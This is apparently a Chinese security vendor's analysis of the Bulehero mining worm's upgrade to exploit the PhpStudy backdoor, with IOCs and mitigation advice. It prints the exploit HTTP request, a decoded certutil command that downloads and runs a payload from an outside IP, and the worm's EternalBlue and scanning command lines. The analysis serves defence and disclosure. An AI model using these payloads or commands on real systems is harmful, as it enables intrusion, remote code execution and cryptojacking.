概述

近日，阿里云安全团队监控到Bulehero挖矿蠕虫进行了版本升级，蠕虫升级后开始利用最新出现的PHPStudy后门漏洞作为新的攻击方式对Windows主机进行攻击，攻击成功后会下载门罗币挖矿程序进行牟利。该挖矿程序会大肆抢占服务器CPU资源进行门罗币的挖掘，造成服务器卡顿，严重影响正常业务运行，甚至造成业务终端。关于该蠕虫最早曝光于2018年7月，蠕虫自出现后频繁更新，陆续加入多达数十种的的攻击方式，可以预计该黑客团伙将会不断的寻找新的攻击方式来植入其恶意程序。建议用户及时排查自身主机是否存在安全漏洞，并关注阿里云安全团队的相关文章。

背景介绍

Bulehero

Bulehero挖矿蠕虫最早出现于2018年初，初次曝光于2018年8月，因最早使用bulehero.in域名被命名为Bulehero。该蠕虫专注于攻击Windows服务器，通过植入恶意挖矿软件进行牟利。它使用多种复杂的攻击方式进行传播，自出现后更新频繁，不断的将新的攻击方式加入自己的武器库。

PhpStudy后门漏洞

PhpStudy是国内的一款免费的PHP调试环境的程序集成包，在国内有着近百万的PHP语言学习者和开发者用户。在2019年9月20日，网上爆出PhpStudy存在“后门”：黑客早在2016年就编写了“后门”文件，并非法侵入了PhpStudy的官网，篡改了软件安装包植入“后门”。该“后门”具有远程控制计算机的功能，可以远程控制下载运行脚本实现用户个人信息收集。据报道黑客利用该漏洞共非法控制计算机67万余台，非法获取大量账号密码类、聊天数据类、设备码类等数据10万余组。该“后门”除了会造成挖矿和信息泄露，还有可能被勒索病毒利用，服务器关键数据被勒索病毒加密后将无法找回，给被害者造成大量的数据、经济损失。

蠕虫分析

攻击行为分析

攻击者会向被攻击的服务器发送一个利用漏洞的HTTP GET请求，恶意代码存在于请求头的Accept-Charset字段，字段内容经过base64编码。解码后可以发现这是一段windows命令：利用certutil.exe工具下载download.exe

GET /index.php HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Charset: c3lzdGVtKCdjZXJ0dXRpbC5leGUgLXVybGNhY2hlIC1zcGxpdCAtZiBodHRwOi8vNjAuMTY0LjI1MC4xNzA6Mzg4OC9kb3dubG9hZC5leGUgJVN5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3aGZxMTM5OTAuZXhlICYgJVN5c3RlbVJvb3QlL1RlbXAvZ2Jubm5teXdrdmd3aGZxMTM5OTAuZXhlJyk7ZWNobyBtZDUoJ3BocHN0dWR5Jyk7
Accept-Encoding: gzip,deflate
Accept-Language: zh-cn
Referer: http://xxx:80/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: xxx

解码后内容：

system('certutil.exe -urlcache -split -f http://60.164.250.170:3888/download.exe %SystemRoot%/Temp/gbnnnmywkvgwhfq13990.exe & %SystemRoot%/Temp/gbnnnmywkvgwhfq13990.exe');echo md5('phpstudy');

被感染主机行为

如上图是恶意文件在主机中的行为流程图，download.exe是Bulehero的下载器，会下载名为ScarupnpLogon.exe
的文件。该文件会释放多个打包的恶意文件，这些恶意文件可分为三个模块：挖矿模块、扫描模块、攻击模块。

• 挖矿模块：该模块进行门罗币的挖矿，Bulehero在该版本中并未使用公共矿池进行挖矿，改用自建的矿池代理进行挖矿任务分发，因此可以避免暴露钱包地址，防止安全研究人员的跟踪。
• 扫描模块：该模块会扫描互联网的特定开放端口，并将扫描结果写入到名为Result.txt的文件中

C:\Windows\gstmlepnk\ntkpmzgif\uktkebigm.exe -iL C:\Windows\gstmlepnk\ntkpmzgif\ip.txt -oJ C:\Windows\gstmlepnk\ntkpmzgif\Result.txt --open --rate 4096 -p 445

• 攻击模块：
  该模块集成多种漏洞利用工具，读取扫描结果并攻击其他主机，如下进程是其使用永恒之蓝漏洞模块进行攻击。

C:\Windows\gstmlepnk\UnattendGC\specials\svschost.exe --InConfig C:\Windows\gstmlepnk\UnattendGC\specials\svschost.xml --TargetIp 106.14.149.128 --TargetPort 445 --DllPayload C:\Windows\gstmlepnk\UnattendGC\AppCapture64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll

我们对比Bulehero升级前的样本行为，发现它在主机中的行为并未有较大改变，依然是通过download.exe下载器下载文件包，并释放三个功能模块。但是它为了隐藏自身改变了恶意文件命名方式，升级前通过混淆的系统文件名进行伪装，升级后全部为随机的文件路径和文件名。虽然随机文件名相对于混淆系统文件名更容易暴露自己，但这种策略的好处是可以避免被其他挖矿病毒通过进程指纹清除，在资源竞争中占据优势。

• 其他行为
  使用netsh ipsec安全工具，阻断存在漏洞的服务端口，防止其他竞争者进入。

netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
netsh ipsec static add filteraction name=BastardsList action=block

修改主机host防止其他竞争者劫持域名。

cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM

时间线

我们根据Bulehero的恶意文件编译时间和文件上传时间，可以确定Bulehero的升级时间是在10月6号的23点，距离PhpStudy后门漏洞利用方式曝光只有2周。如果企业存在漏洞，去除中间的国庆长假，真正留给企业的修复之间只有几天。从恶意文件下载次数来看，截止到发稿前已经有1万5千次的下载，可见该蠕虫传播速度极快，造成的破坏性很大。

其他攻击方式

除了此次更新增加的PhpStudy后门漏洞，Bulehero还使用多种攻击方式，如下是其他已知的攻击方式。

IOCs

60[.]164[.]250[.]170
185[.]147[.]34[.]136
fky[.]dfg45dfg45[.]best
uu[.]dfg45dfg45[.]best
uu1[.]dfg45dfg45[.]best
ox[.]mygoodluck[.]best
oo[.]mygoodluck[.]best

安全建议

1. 企业需要对涉及的漏洞及时修复，否则容易成为挖矿木马的受害者。
2. 建议使用阿里云安全的下一代云防火墙产品，其阻断恶意外联、能够配置智能策略的功能，能够有效帮助防御入侵。哪怕攻击者在主机上的隐藏手段再高明，下载、挖矿、反弹shell这些操作，都需要进行恶意外联；云防火墙的拦截将彻底阻断攻击链。此外，用户还可以通过自定义策略，直接屏蔽恶意网站，达到阻断入侵的目的。此外，云防火墙独有的虚拟补丁功能，能够帮助客户更灵活、更“无感”地阻断攻击。
3. 对于有更高定制化要求的用户，可以考虑使用阿里云安全管家服务。购买服务后将有经验丰富的安全专家提供咨询服务，定制适合您的方案，帮助加固系统，预防入侵。入侵事件发生后，也可介入直接协助入侵后的清理、事件溯源等，适合有较高安全需求的用户，或未雇佣安全工程师，但希望保障系统安全的企业。

本文作者：桑铎